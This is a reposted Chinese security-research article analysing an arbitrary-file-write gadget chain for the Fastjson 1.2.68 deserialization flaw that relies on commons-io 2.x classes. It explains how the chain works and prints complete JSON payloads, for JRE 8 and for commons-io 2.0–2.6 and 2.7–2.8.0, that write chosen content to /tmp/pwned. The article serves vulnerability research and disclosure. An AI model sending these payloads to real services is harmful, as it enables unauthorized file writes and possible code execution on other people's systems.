Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析

渗透技巧 4年前 (2021) admin
806 0 0
微信又改版了,为了我们能一直相见
你的加星在看对我们非常重要
点击“长亭安全课堂”——主页右上角——设为星标?
期待与你的每次见面~

本文旨在阐述分析fastjson1.2.68 反序列化漏洞在有commons-io2.x 版本依赖下的任意写文件利用链。



Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
写作起因


距离 fastjson 1.2.68 autotype bypass 反序列化漏洞曝光(具体漏洞情况请见:漏洞风险提示 | Fastjson 远程代码执行漏洞到现在已过去正好差不多一年左右的时间,有读者可能好奇我为什么现在才写这篇文章,并不是我想炒冷饭或者故意藏到现在才发出来。它当时刚曝光出来时我也有尝试过寻找其通用的利用链,但分析完漏洞原理后发现这是一件相当麻烦的事情,自觉能力和精力不够也就一度放弃,想伸手当白嫖党。

而这期间始终未曾见到有什么杀伤性特别大的 PoC。杀伤性大就我理解是指漏洞利用无需出网、利用条件少或者极容易满足。当然也许有非常厉害的 PoC 有人在偷偷流传使用,不过都经过两轮 HW 洗礼了,该抓的流量应该早被抓出来曝光了吧。

直到前不久,有同事扔给我看一篇漏洞复现的文章《fastjson v1.2.68 RCE利用链复现》,我才发现这个 JRE 链其实公开的时间已经挺久了,最早由浅蓝在他的博客公开挖掘相关利用链的思路:https://b1ue.cn/archives/382.html

随后由沈沉舟(四哥)对浅蓝的思路进行延伸:
  • http://scz.617.cn:8/web/202008081723.txt
  • http://scz.617.cn:8/web/202008100900.txt
  • http://scz.617.cn:8/web/202008111715.txt
以及最终 Rmb122 的成果:

https://rmb122.com/2020/06/12/fastjson-1-2-68-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E-gadgets-%E6%8C%96%E6%8E%98%E7%AC%94%E8%AE%B0/

直到近段时间我重新仔细审视了下这些利用链构造的相关文章,我才发现了一些之前在尝试寻找利用链时所忽视的问题,也因此有了一些新的发现,找到一个仅需依赖commons-io2.x 版本即可任意写文件的利用链。而我的这些发现也是基于各位同仁的成果之上,故写作此文将其公开、大家互相交流学习进步。


Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
JRE写文件利用链的限制
目前已公开的 JRE 8 下的写文件利用链 PoC
{    "x":{        "@type":"java.lang.AutoCloseable",        "@type":"sun.rmi.server.MarshalOutputStream",        "out":{            "@type":"java.util.zip.InflaterOutputStream",            "out":{                "@type":"java.io.FileOutputStream",                "file":"/tmp/dest.txt",                "append":false            },            "infl":{                "input":"eJwL8nUyNDJSyCxWyEgtSgUAHKUENw=="            },            "bufLen":1048576        },        "protocolVersion":1    }}

‍‍注:此 PoC 在更高版本的 JRE 下也有变种,不过实际环境中几乎不怎么碰到 以上的版本,所以这里只讨论 JRE 8 版本。

sun.rmi.server.MarshalOutputStreamjava.util.zip.InflaterOutputStream 以及 java.io.FileOutputStream 均是基于带参数的构造函数进行构建。

fastjson 在通过带参构造函数进行反序列化时,会检查参数是否有参数名,只有含有参数名的带参构造函数才会被认可:

JavaBeanInfo.build 方法中检查参数名的代码片段:
......
boolean is_public = (constructor.getModifiers() & 1) != 0;if (is_public) { String[] lookupParameterNames = ASMUtils.lookupParameterNames(constructor); if (lookupParameterNames != null && lookupParameterNames.length != 0 && (creatorConstructor == null || paramNames == null || lookupParameterNames.length > paramNames.length)) { paramNames = lookupParameterNames; creatorConstructor = constructor; }}
......
什么情况下类构造函数的参数会有参数名信息呢?只有当这个类 class 字节码带有调试信息且其中包含有变量信息时才会有。
可以通过如下命令来检查,如果有输出 LocalVariableTable则证明其 class 字节码里的函数参数会有参数名信息:
javap -l <class_name> | grep LocalVariableTable
而我在多个不同的操作系统下的 OpenJDKOracle JDK 进行测试,目前只发现 CentOS 下的 OpenJDK 8 字节码调试信息中含有 LocalVariableTable(根据沈沉舟的文章,RedHat 下的 JDK8 安装包也会有,不过他并未说明是 OpenJDK 还是 Oracle JDK,我未做测试)。
总之可以得出结论的是,由于此利用链对 Java 环境的要求,实际渗透测试中满足此要求的环境还是占小部分,需要寻找更为通用的利用链。

Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
寻找新链
寻找新链还是借鉴浅蓝之前的思路:






需要一个通过 set 方法或构造方法指定文件路径的 OutputStream;


需要一个通过 set 方法或构造方法传入字节数据的 OutputStream,并且可以通过 set 方法或构造方法传入一个 OutputStream,最后可以通过 write 方法将传入的字节码 write 到传入的 OutputStream;


需要一个通过 set 方法或构造方法传入一个 OutputStream,并且可以通过调用 toString、hashCode、get、set、构造方法 调用传入的 OutputStream 的 flush 方法;


以上三个组合在一起就能构造成一个写文件的利用链。

由于大部分 JDK/JRE 环境的类字节码里都不含有 LocalVariableTable,而我注意到很多第三方库里的字节码是有 LocalVariableTable 的。因此我把目光转向 maven 使用量 top100 的第三方库,寻找其中所有实现 java.lang.AutoCloseable 接口的、同时保留有 LocalVariableTable 调试信息的类,并按照 fastjson 1.2.68 的黑名单进行筛选去除。

经过一番漫长的探索后,出于以下几个考虑,我最终决定把目光集中在 commons-io 库中:

  • commons-io 库是非常常见的第三方库

  • commons-io 库里的类字节码带有LocalVariableTable 调试信息
  • commons-io 库里几乎没有类在 fastjson 黑名单中
  • commons-io 库里基本都是跟 io 相关的类,跟 AutoCloseable 关联性比较强,可探索的地方很多

最终如愿以偿,成功找到一条新的写文件的链。

接下来先按照利用链的组成对核心类做一个简要的分析,环境以 fastjson 1.2.68commons-io 2.5 为例。



Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
commons-io 利用链分析


XmlStreamReader

org.apache.commons.io.input.XmlStreamReader 的构造函数中接受 InputStream 对象为参数:
 public XmlStreamReader(InputStream is, String httpContentType, boolean lenient, String defaultEncoding) throws IOException {        this.defaultEncoding = defaultEncoding;        BOMInputStream bom = new BOMInputStream(new BufferedInputStream(is, 4096), false, BOMS);        BOMInputStream pis = new BOMInputStream(bom, true, XML_GUESS_BYTES);        this.encoding = this.doHttpStream(bom, pis, httpContentType, lenient);        this.reader = new InputStreamReader(pis, this.encoding);
并且随后会触发 InputStream.read()调用过程如下:
XmlStreamReader.<init>(InputStream, String, boolean, String)-> XmlStreamReader.doHttpStream(BOMInputStream, BOMInputStream, String, boolean)-> BOMInputStream.getBOMCharsetName()-> BOMInputStream.getBOM()-> BufferedInputStream.read()-> BufferedInputStream.fill()-> InputStream.read(byte[], int, int)
BOMInputStream.getBOM() 方法:
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
因此 XmlStreamReader 的构造函数作为整个链的入口,链到 InputStream.read(byte[], int, int) 方法。

TeeInputStream

org.apache.commons.io.input.TeeInputStream 的构造函数接受 InputStream 和 OutputStream 对象为参数:
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
而它的 read 方法,会把 InputStream 流里读出来的东西,再写到 OutputStream 流里,正如其名,像是管道重定向:
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
通过 TeeInputStreamInputStream 输入流里读出来的东西可以重定向写入到 OutputStream 输出流。

ReaderInputStream + CharSequenceReader

org.apache.commons.io.input.ReaderInputStream 的构造函数接受 Reader 对象作为参数:
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
它在执行 read 方法时,会执行 fillBuffer 方法,从而执行 Reader.read(char[], int, int) 方法,从 Reader 中来获取输入:
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
org.apache.commons.io.input.CharSequenceReader 的构造函数接受 CharSequence 对象作为参数:
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
它在执行 read 方法时,会读取 CharSequence 的值:
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
因此组合一下 ReaderInputStream 和 CharSequenceReader,就能构建出从自定义字符串里读输入的 InputStream
{  "@type":"java.lang.AutoCloseable",  "@type":"org.apache.commons.io.input.ReaderInputStream",  "reader":{    "@type":"org.apache.commons.io.input.CharSequenceReader",    "charSequence":{"@type":"java.lang.String""aaaaaa......(YOUR_INPUT)"  },  "charsetName":"UTF-8",  "bufferSize":1024}
注意这里为了构建 charSequence 传入自己输入的字符串参数,根据 StringCodec.deserialze(DefaultJSONParser, Type, Object) 方法对 JSON 结构做了一些改变,看起来是畸形的 JSON,但是可以被 fastjson 正常解析。
那么现在有触发 InputStream read 方法的链入口,也有能传入可控内容的 InputStream,只差一个自定义输出位置的 OutputStream 了。

WriterOutputStream + FileWriterWithEncoding

org.apache.commons.io.output.WriterOutputStream 的构造函数接受 Writer 对象作为参数:
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
它在执行 write 方法时,会执行 flushOutput 方法,从而执行 Writer.write(char[], int, int),通过 Writer 来输出:
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
org.apache.commons.io.output.FileWriterWithEncoding 的构造函数接受 File 对象作为参数,并最终以 File 对象构建 FileOutputStream 文件输出流:
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
因此组合一下 WriterOutputStream 和 FileWriterWithEncoding,就能构建得到输出到指定文件的 OutputStream

buffer 大小问题

万事俱备,现在我们尝试将这些类组合起来试试:
{  "@type":"java.lang.AutoCloseable",  "@type":"org.apache.commons.io.input.XmlStreamReader",  "is":{    "@type":"org.apache.commons.io.input.TeeInputStream",    "input":{      "@type":"org.apache.commons.io.input.ReaderInputStream",      "reader":{        "@type":"org.apache.commons.io.input.CharSequenceReader",        "charSequence":{"@type":"java.lang.String""aaaaaa"      },      "charsetName":"UTF-8",      "bufferSize":1024    },    "branch":{      "@type":"org.apache.commons.io.output.WriterOutputStream",      "writer": {        "@type":"org.apache.commons.io.output.FileWriterWithEncoding",        "file": "/tmp/pwned",        "encoding": "UTF-8",        "append": false      },      "charsetName": "UTF-8",      "bufferSize": 1024,      "writeImmediately": true    },    "closeBranch":true  },  "httpContentType":"text/xml",  "lenient":false,  "defaultEncoding":"UTF-8"}
尝试用 fastjson 进行解析执行,发现文件创建了,也确实执行到了 FileWriterWithEncoding.write(char[], int, int) 方法,但是文件内容是空的?
这里涉及到的一个问题就是,当要写入的字符串长度不够时,输出的内容会被保留在 ByteBuffer 中,不会被实际输出到文件里:
sun.nio.cs.StreamEncoder#implWrite
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
问题搞清楚了,我们需要写入足够长的字符串才会让它刷新 buffer,写入字节到输出流对应的文件里。那么很自然地想到,在 charSequence 处构造超长字符串是不是就可以了?
可惜并非如此,原因是 InputStream buffer 的长度大小在这里已经是固定的 4096 了:
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
也就是说每次读取或者写入的字节数最多也就是 4096,但 Writer buffer 大小默认是 8192
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
因此仅仅一次写入在没有手动执行 flush 的情况下是无法触发实际的字节写入的。

循环引用

怎么解决上述 buffer 大小的问题?
有过 fastjson 代码分析经验的读者也许会猜到解决办法,那就是通过 $ref 循环引用,多次往同一个 OutputStream 流里输出即可。一次不够 overflow 就多写几次,直到 overflow 为止,就能触发实际的文件写入操作。

Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析

commons-io 利用链PoC

利用链的构造分析完毕,这里给出最终的 PoC
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析

commons-io 2.0 – 2.6 版本:

{  "x":{    "@type":"com.alibaba.fastjson.JSONObject",    "input":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.ReaderInputStream",      "reader":{        "@type":"org.apache.commons.io.input.CharSequenceReader",        "charSequence":{"@type":"java.lang.String""aaaaaa...(长度要大于8192,实际写入前8192个字符)"      },      "charsetName":"UTF-8",      "bufferSize":1024    },    "branch":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.output.WriterOutputStream",      "writer":{        "@type":"org.apache.commons.io.output.FileWriterWithEncoding",        "file":"/tmp/pwned",        "encoding":"UTF-8",        "append": false      },      "charsetName":"UTF-8",      "bufferSize": 1024,      "writeImmediately": true    },    "trigger":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "is":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    },    "trigger2":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "is":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    },    "trigger3":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "is":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    }  }}
‍‍‍commons-io 2.7 – 2.8.0 版本:
{  "x":{    "@type":"com.alibaba.fastjson.JSONObject",    "input":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.ReaderInputStream",      "reader":{        "@type":"org.apache.commons.io.input.CharSequenceReader",        "charSequence":{"@type":"java.lang.String""aaaaaa...(长度要大于8192,实际写入前8192个字符)",        "start":0,        "end":2147483647      },      "charsetName":"UTF-8",      "bufferSize":1024    },    "branch":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.output.WriterOutputStream",      "writer":{        "@type":"org.apache.commons.io.output.FileWriterWithEncoding",        "file":"/tmp/pwned",        "charsetName":"UTF-8",        "append": false      },      "charsetName":"UTF-8",      "bufferSize": 1024,      "writeImmediately": true    },    "trigger":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "inputStream":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    },    "trigger2":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "inputStream":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    },    "trigger3":{      "@type":"java.lang.AutoCloseable",      "@type":"org.apache.commons.io.input.XmlStreamReader",      "inputStream":{        "@type":"org.apache.commons.io.input.TeeInputStream",        "input":{          "$ref":"$.input"        },        "branch":{          "$ref":"$.branch"        },        "closeBranch": true      },      "httpContentType":"text/xml",      "lenient":false,      "defaultEncoding":"UTF-8"    }  }
‍‍而对于 commons-io 1.x 版本而言,缺乏 XmlStreamReaderWriterOutputStreamReaderInputStream 类,因此光靠 commons-io 此路不通,但按照这个思路,肯定还有其他的第三方库中有类可以达成类似的目的,个人精力有限,这些就留给感兴趣的读者自行挖掘了。

Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
后记

浅蓝的文章以及和他私下的交流对我挖掘利用链的过程起到了很大的帮助,沈沉舟和 Rmb122 的文章以及发现成果也纠正了我之前一些对 fastjson 的认知误区,很有帮助。在此感谢各位。



Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
参考资料
  • https://b1ue.cn/archives/382.html

  • http://scz.617.cn:8/web/202008081723.txt
  • http://scz.617.cn:8/web/202008100900.txt

  • http://scz.617.cn:8/web/202008111715.txt

  • https://rmb122.com/2020/06/12/fastjson-1-2-68-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E-gadgets-%E6%8C%96%E6%8E%98%E7%AC%94%E8%AE%B0/

  • https://mp.weixin.qq.com/s/HMlaMPn4LK3GMs3RvK6ZRA

  • https://stackoverflow.com/questions/1508235/determine-whether-class-file-was-compiled-with-debug-info/1508403

  • https://github.com/LeadroyaL/fastjson-blacklist

  • https://github.com/alibaba/fastjson/wiki/%E5%BE%AA%E7%8E%AF%E5%BC%95%E7%94%A8




End


Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析

Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
点分享
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
点收藏
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
点点赞
Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析
点在看

原文始发于微信公众号(长亭技术沙盒):Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析

版权声明:admin 发表于 2021年5月27日 下午2:00。
转载请注明:Fastjson 1.2.68 反序列化漏洞 Commons IO 2.x 写文件利用链挖掘分析 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...